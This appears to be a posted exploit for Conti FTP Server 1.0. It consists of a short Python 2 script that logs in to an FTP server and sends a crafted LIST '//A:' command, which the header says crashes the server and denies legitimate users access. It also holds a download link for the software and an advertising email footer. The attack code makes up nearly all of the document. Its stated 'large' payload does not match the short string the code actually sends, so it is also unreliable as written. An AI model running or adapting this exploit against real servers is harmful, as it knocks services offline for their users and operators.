Conti FTP server version 1.0 remote denial of service exploit.
ddff10bf2fa8147ea039c700a80ab1c5fe40007191288a4cce22deb9d0136dc7
#Conti FTP Server v1.0 Denial of Service
#author: 35c666
#contact: :(
#Download:
https://www.procesualitatea.ro/bestplay/Conti_FtpServer_Setup.exe
#Bug: Conti Ftp Server crashes when a large //A: string is sent,
denying legitimate users access to their accounts.
#greetz to all RST members at https://rstzone.net
# usr/bin/python
import socket
import time
buff = "//A:"
user = "test"
password = "test"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("172.16.112.129",21))
d = s.recv(1024)
print "Server <- " + d
time.sleep(2)
s.send('USER %s\r\n' % user)
print "Client -> USER " + user
d = s.recv(1024)
print "Server <- " + d
time.sleep(2)
s.send('PASS %s\r\n' % password)
print "Client -> PASS " + password
d = s.recv(1024)
print "Server <- " + d
time.sleep(2)
s.send('LIST %s\r\n' % buff)
print "Client -> LIST " + buff
d = s.recv(1024)
print d
time.sleep(2)
except:
print "- Nu m-am putut conecta."
--
Click for FHA loan, $0 lender fees, low rates & approvals nationwide
https://tagline.hushmail.com/fc/Ioyw6h4dOJ5vAvidooorO3QwkYqsdtxW1lWMSsqYoY19IzyPIitWQU/